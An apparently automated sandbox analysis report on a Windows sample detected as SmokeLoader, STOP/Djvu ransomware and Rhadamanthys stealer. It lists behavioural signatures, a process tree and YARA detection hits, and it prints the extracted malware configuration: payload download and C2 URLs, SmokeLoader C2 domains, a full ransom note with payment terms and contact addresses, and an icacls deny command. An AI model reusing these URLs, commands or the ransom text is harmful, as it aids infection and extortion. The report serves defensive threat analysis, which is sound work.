Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	808616
MD5:	0a0416b98547fb41ec314c676979779e
SHA1:	2e572a453e97f1d44f08ac1ea4065378dd4082a8
SHA256:	5ea4451ca1ce36db2dc6e7a85f07c748ddbb758b65f2194d734afd08bd141126
Infos:

Detection

Djvu, RHADAMANTHYS, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected AntiVM3

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Yara detected RHADAMANTHYS Stealer

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Creates processes via WMI

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Tries to harvest and steal Bitcoin Wallet information

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Found potential ransomware demand text

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Detected VMProtect packer

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Yara detected Keylogger Generic

Connects to a URL shortener service

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Entry point lies outside standard sections

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Installs a raw input device (often for capturing keystrokes)

PE file contains an invalid checksum

Uses cacls to modify the permissions of files

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Connects to several IPs in different countries

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

file.exe (PID: 5176 cmdline: C:\Users\user\Desktop\file.exe MD5: 0A0416B98547FB41EC314C676979779E)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

1128.exe (PID: 4608 cmdline: C:\Users\user\AppData\Local\Temp\1128.exe MD5: 93CEC9D367D574FC3120469D0340FB39)

conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780b MD5: 73C519F050C20580F8A62C849D49215A)

A4A.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\A4A.exe MD5: 34365553C6887DD20EEE38713CEEDECA)

A4A.exe (PID: 2208 cmdline: C:\Users\user\AppData\Local\Temp\A4A.exe MD5: 34365553C6887DD20EEE38713CEEDECA)

icacls.exe (PID: 5428 cmdline: icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)

8EAD.exe (PID: 4784 cmdline: C:\Users\user\AppData\Local\Temp\8EAD.exe MD5: 422BAE02B141829FF15435A9116E33F7)

F207.exe (PID: 4780 cmdline: C:\Users\user\AppData\Local\Temp\F207.exe MD5: A87C48E5E8F12F9FF6F6D868BF9D9252)

DE4C.exe (PID: 4776 cmdline: C:\Users\user\AppData\Local\Temp\DE4C.exe MD5: EDB228CBA3FC937A6008E00B44A28343)

WerFault.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

42FE.exe (PID: 1092 cmdline: C:\Users\user\AppData\Local\Temp\42FE.exe MD5: 710475FAD4072F93192DB19F14847C42)

llpb1133.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Local\Temp\llpb1133.exe" MD5: E80EFC25A192B860387B90C209EF9D6B)

yuzhenzhang.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe" MD5: B9363486500E209C05F97330226BBF8A)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

352F.exe (PID: 1328 cmdline: C:\Users\user\AppData\Local\Temp\352F.exe MD5: 710475FAD4072F93192DB19F14847C42)

llpb1133.exe (PID: 3952 cmdline: "C:\Users\user\AppData\Local\Temp\llpb1133.exe" MD5: E80EFC25A192B860387B90C209EF9D6B)

9760.exe (PID: 3960 cmdline: C:\Users\user\AppData\Local\Temp\9760.exe MD5: 42FBE2A0D64819B3D2FF1E29208A5D77)

WerFault.exe (PID: 4572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

849F.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\849F.exe MD5: 8D702FEEDAFB6BA663FA84DD131E049A)

ECAC.exe (PID: 6092 cmdline: C:\Users\user\AppData\Local\Temp\ECAC.exe MD5: 34365553C6887DD20EEE38713CEEDECA)

ECAC.exe (PID: 5488 cmdline: C:\Users\user\AppData\Local\Temp\ECAC.exe MD5: 34365553C6887DD20EEE38713CEEDECA)

WerFault.exe (PID: 1816 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3960 -ip 3960 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

DC3D.exe (PID: 3344 cmdline: C:\Users\user\AppData\Local\Temp\DC3D.exe MD5: 89AF5F0E7D2B08F92443BD39F80948C8)

DC3D.exe (PID: 4432 cmdline: C:\Users\user\AppData\Local\Temp\DC3D.exe MD5: 89AF5F0E7D2B08F92443BD39F80948C8)

A4A.exe (PID: 5924 cmdline: "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe" --AutoStart MD5: 34365553C6887DD20EEE38713CEEDECA)

rirdbih (PID: 4936 cmdline: C:\Users\user\AppData\Roaming\rirdbih MD5: 0A0416B98547FB41EC314C676979779E)

A4A.exe (PID: 1284 cmdline: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe --Task MD5: 34365553C6887DD20EEE38713CEEDECA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
STOP	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/ https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.	No Attribution	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://www.malware-traffic-analysis.net/2023/01/03/index.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UQkYLBSiQ4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0647JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6pr4lrmSF+nrv+WJ2ojW\\\\nOwnynOY9I8+LodREL0771QE\\/eG6rOsC0fpMQ9pzAOAr\\/mzGF6pCHp2xgQT98Y2Es\\\\nK17rBgbhru6S98R1Vy6iSd14yiRg9AYFrfYTz3slknBcthhlCQlHPUafEvGWl52w\\\\nTJDdKYcpnitEemrWdAaNig+7sCEbwPtjqGBogMyhNhju1rDhmnU5klYQgI6HVzRr\\\\nIHPFB2M26tUPNgtjGhK1TJQgJIVN3N7f1dJ\\/2+ef59Jh\\/N8EIBwCZPQfmqzfM3rt\\\\n7TVKl4NSOemVMbZx9eiABALPqM5RBn\\/jrVXMLJyp4GBVHuG2lK1N2PWVyZGL5Vxb\\\\nbQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Threatname: SmokeLoader

{"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x11b0fa3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 0x16d7328:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
dump.pcap	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x11b0c9a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x16d701f:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x11b0d27:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x16d70ac:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x11b0d27:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x16d70ac:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x11b104d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x16d73d2:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x11b11b3:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ... 0x16d74a0:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.705303961.0000000000606000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1648:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.439049903.00000000005E6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6353:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.706906368.0000000002210000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.287939420.0000000000580000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.288156883.0000000000746000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x622f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.427978506.00000000005F6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6426:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.438844235.00000000005C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001B.00000002.416891695.0000000002232000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.422729797.0000000000610000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000017.00000002.422861272.0000000000666000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x619e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000002A.00000002.587743224.000000000228A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000019.00000002.413738887.0000000002337000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000002.395568327.0000000000700000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.382364592.0000000002258000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.375676925.00000000007C6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5907:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000F.00000002.395494716.0000000000616000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x64bf:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.356632999.0000000000D10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
